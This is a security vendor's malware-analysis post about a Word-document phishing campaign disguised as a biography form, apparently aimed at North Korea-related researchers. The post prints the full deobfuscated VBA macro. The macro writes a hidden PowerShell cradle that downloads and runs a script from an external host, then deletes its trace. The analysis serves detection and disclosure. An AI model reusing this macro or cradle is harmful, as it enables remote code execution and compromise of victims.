Since last month, the ASEC analysis team has been continuously uploading posts about APT attacks using word documents. Recently, it found that the malware of the same type is being constantly distributed in the name of ‘BIO form.’ By looking at the distribution history of previous word documents, we can assume that this file is also targeting professors or research center directors related to North Korea while disguising itself as a biography form.
The recently discovered file that is being distributed also runs the dotm file that includes a malicious macro through the external link inside the word file. The following shows the external link included in the ‘BIO Form (Mr. XX).docx‘ file that was found to be distributed on August 2nd.

The downloaded BIO.dotm file includes a malicious macro. The macro code is obfuscated in the same method as the previous one. Unobfuscating the macro reveals the code as shown below.
Private Sub Document_Open()
Set djfeihfidkasljf = CreateObject("Shell.Application")
dfgdfjiejfjdshaj = "powershell.exe"
dfjsdjailfksf = "C:\windows\temp\Ahnlab.log"
skdjfksjkfjkdsfj = "$fjeils={(New-Object Net.WebClient).Dring('hxxp://zenma.getenjoyment.net/ja/ng.txt')};[string]$aiwdf=$fjeils;$ndask=$aiwdf.insert(28,'ownloadst');$bmcns=iex $ndask;iex $bmcns"
Open Trim(dfjsdjailfksf) For Output As #2
Print #2, skdjfksjkfjkdsfj
Close #2
dfisafkdjaflkjs = "$a='C:\windows\temp\ahnlab.log';$d=[IO.File]::ReadAllText($a);$e=iex $d;iex $e"
djfeihfidkasljf.ShellExecute dfgdfjiejfjdshaj, dfisafkdjaflkjs, "", "open", 0
Dim SngSec As Single
SngSec = Timer + 5
Do While Timer < SngSec
DoEvents
Loop
Kill (dfjsdjailfksf)
End Sub
Previously the macro performed a powershell command that attempts to directly download files from a certain URL. But this macro code had its method changed to create a download command in the ‘Ahnlab.log‘ file and run the created file.

The powershell command performed upon running the word file was changed as shown below.

The script that is in hxxp://zenma.getenjoyment.net/ja/ng.txt, which is ultimately executed performs the same feature as in previous cases.

As word documents that exploit external links and target certain users are still being distributed, users need to take extra caution.
AhnLab’s anti-malware product, V3, detects and blocks the types of files above using the aliases below.
[File Detection]
- Downloader/XML.External
- Downloader/DOC.Agent
[Related Post]
Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.
Categories:Malware Information